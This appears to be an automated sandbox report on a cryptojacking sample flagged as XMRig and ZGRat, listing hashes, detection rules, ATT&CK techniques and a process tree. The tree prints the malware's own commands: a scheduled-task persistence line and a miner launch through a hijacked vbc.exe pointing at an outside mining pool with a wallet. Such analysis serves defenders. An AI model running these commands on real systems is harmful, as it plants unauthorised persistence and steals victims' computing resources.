xmrig | 8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1

General

Target

tmp.exe
Size

5.6MB
MD5

1a27bd843a09f923661a15300e02d703
SHA1

5cb66b20c4cbda0cd080bb2380034d7da9cc7ce6
SHA256

8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1
SHA512

330a78e0214304d4786d8d2d98905fbff7c530042eac93ea133995661a7432c60a9bb052804598479c461da6bef4bfdbffb8a5e8cd473fd6a96ff0012ceaab05
SSDEEP

49152:q6orqtRW0jfH4+8MjRJHiEpxxH4vNpQXGp8mih7NUfXUu4tEqNrqcqapPeDkwVzO:foWjZG/Mul2rq/aReDkizMeQU4T

Score

10^/10

Malware Config

Signatures

Detect ZGRat V1 3 IoCs

resource	yara_rule
behavioral2/memory/2844-0-0x0000000000400000-0x00000000009A0000-memory.dmp	family_zgrat_v1
behavioral2/files/0x0006000000023207-11.dat	family_zgrat_v1
behavioral2/files/0x0006000000023207-12.dat	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 14 IoCs

miner

resource	yara_rule
behavioral2/memory/1788-22-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1788-21-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1788-25-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1788-27-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1788-26-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1788-28-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1788-29-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1788-30-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1788-31-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1788-33-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1788-34-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1788-35-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1788-36-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1788-39-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig

.NET Reactor proctector 3 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/memory/2844-0-0x0000000000400000-0x00000000009A0000-memory.dmp	net_reactor
behavioral2/files/0x0006000000023207-11.dat	net_reactor
behavioral2/files/0x0006000000023207-12.dat	net_reactor

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation	.exe
Key value queried	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation	.exe

Executes dropped EXE 2 IoCs

pid	Process
1896	.exe
1760	.exe

UPX packed file 17 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1788-17-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1788-19-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1788-20-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1788-22-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1788-21-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1788-25-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1788-27-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1788-26-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1788-28-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1788-29-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1788-30-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1788-31-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1788-33-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1788-34-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1788-35-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1788-36-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1788-39-0x0000000140000000-0x00000001407DC000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1896 set thread context of 1788	1896	.exe	102

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2808	schtasks.exe
524	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1760	timeout.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1896	.exe
1760	.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
672	Process not Found

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2844	tmp.exe
Token: SeDebugPrivilege	1896	.exe
Token: SeLockMemoryPrivilege	1788	vbc.exe
Token: SeLockMemoryPrivilege	1788	vbc.exe
Token: SeDebugPrivilege	1760	.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1788	vbc.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 2844 wrote to memory of 3444	2844	tmp.exe	86
PID 2844 wrote to memory of 3444	2844	tmp.exe	86
PID 3444 wrote to memory of 1760	3444	cmd.exe	88
PID 3444 wrote to memory of 1760	3444	cmd.exe	88
PID 3444 wrote to memory of 1896	3444	cmd.exe	91
PID 3444 wrote to memory of 1896	3444	cmd.exe	91
PID 1896 wrote to memory of 2528	1896	.exe	94
PID 1896 wrote to memory of 2528	1896	.exe	94
PID 2528 wrote to memory of 2808	2528	cmd.exe	96
PID 2528 wrote to memory of 2808	2528	cmd.exe	96
PID 1896 wrote to memory of 1788	1896	.exe	102
PID 1896 wrote to memory of 1788	1896	.exe	102
PID 1896 wrote to memory of 1788	1896	.exe	102
PID 1896 wrote to memory of 1788	1896	.exe	102
PID 1896 wrote to memory of 1788	1896	.exe	102
PID 1896 wrote to memory of 1788	1896	.exe	102
PID 1896 wrote to memory of 1788	1896	.exe	102
PID 1760 wrote to memory of 2156	1760	.exe	105
PID 1760 wrote to memory of 2156	1760	.exe	105
PID 2156 wrote to memory of 524	2156	cmd.exe	108
PID 2156 wrote to memory of 524	2156	cmd.exe	108

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp8AAC.tmp.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3444
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:1760
- - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
    "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1896
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2528
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:2808
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:1788

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1760
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2156
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Creates scheduled task(s)
    PID:524

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Scripting

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
4.9MB

MD5
553c500c3b593fbc8874aa7796e14042

SHA1
720030e9f3425c4b59a1e85cda6a14668531cd94

SHA256
968baaca871da73d3a7ec778426afedfcd57b941f7337f7eed58bff14d540cd7

SHA512
ec6e75b9cf8e2fafcd6787accd31580f961b0211ef47cc3eec6b57519b5b2172e2440b7a2cd95dc62dbc22f9dcaae25a72ed8f2176be9bf0530580d29fa11c7a

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
5.6MB

MD5
1a27bd843a09f923661a15300e02d703

SHA1
5cb66b20c4cbda0cd080bb2380034d7da9cc7ce6

SHA256
8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1

SHA512
330a78e0214304d4786d8d2d98905fbff7c530042eac93ea133995661a7432c60a9bb052804598479c461da6bef4bfdbffb8a5e8cd473fd6a96ff0012ceaab05

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\.exe.log

Filesize
1KB

MD5
e3da8eae01f57153845d1533b6bed268

SHA1
a235712a631c52d2853e9136d9c4431358f34fd2

SHA256
77507c05c8131f73d1dd1500992223819a6ab09cd820716e00bf907c9c7fc857

SHA512
b24b1064f8270981746f49a1b56a1aab21f7985af672bc6dcdbd67e498033714131ba4581c9c3d934e86b56d904bb0ecf322fae498133bbb9cb3a68ea6cad9d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp8AAC.tmp.bat

Filesize
168B

MD5
dc746ee55dff41238073a7c2590e6acd

SHA1
ba0ab531de55e0845e79a8dc0ce7d032022b4184

SHA256
517126a24f464103ee58f7708c201f0a02455bbf5b28feb827923a0f39807269

SHA512
8bb31275450acd2e9541c12eb17a43884626e4ba90035e6e1ed510be6126e10c21a34e4feb7aaf548ddcf9e0e162eca481b34fad31307e285b97f49a41ecc7f4

Download Submit
memory/1760-43-0x00007FFC8F120000-0x00007FFC8FBE1000-memory.dmp

Filesize
10.8MB

Download
memory/1760-47-0x00007FFC8F120000-0x00007FFC8FBE1000-memory.dmp

Filesize
10.8MB

Download
memory/1760-46-0x00000000010C0000-0x00000000010C1000-memory.dmp

Filesize
4KB

Download
memory/1760-45-0x000000001C460000-0x000000001C470000-memory.dmp

Filesize
64KB

Download
memory/1788-37-0x0000021291C90000-0x0000021291CB0000-memory.dmp

Filesize
128KB

Download
memory/1788-30-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1788-41-0x0000021325D10000-0x0000021325D30000-memory.dmp

Filesize
128KB

Download
memory/1788-17-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1788-19-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1788-20-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1788-22-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1788-40-0x0000021291C90000-0x0000021291CB0000-memory.dmp

Filesize
128KB

Download
memory/1788-24-0x0000021291BF0000-0x0000021291C10000-memory.dmp

Filesize
128KB

Download
memory/1788-21-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1788-25-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1788-27-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1788-26-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1788-28-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1788-29-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1788-39-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1788-32-0x0000021291C30000-0x0000021291C70000-memory.dmp

Filesize
256KB

Download
memory/1788-31-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1788-33-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1788-34-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1788-35-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1788-36-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1788-38-0x0000021325D10000-0x0000021325D30000-memory.dmp

Filesize
128KB

Download
memory/1896-14-0x000000001CB60000-0x000000001CB70000-memory.dmp

Filesize
64KB

Download
memory/1896-23-0x00007FFC8E8E0000-0x00007FFC8F3A1000-memory.dmp

Filesize
10.8MB

Download
memory/1896-15-0x0000000001EA0000-0x0000000001EA1000-memory.dmp

Filesize
4KB

Download
memory/1896-13-0x00007FFC8E8E0000-0x00007FFC8F3A1000-memory.dmp

Filesize
10.8MB

Download
memory/2844-0-0x0000000000400000-0x00000000009A0000-memory.dmp

Filesize
5.6MB

Download
memory/2844-16-0x00007FFC8F3B0000-0x00007FFC8FE71000-memory.dmp

Filesize
10.8MB

Download
memory/2844-5-0x000000001C570000-0x000000001C580000-memory.dmp

Filesize
64KB

Download
memory/2844-2-0x0000000001740000-0x0000000001741000-memory.dmp

Filesize
4KB

Download
memory/2844-1-0x00007FFC8F3B0000-0x00007FFC8FE71000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads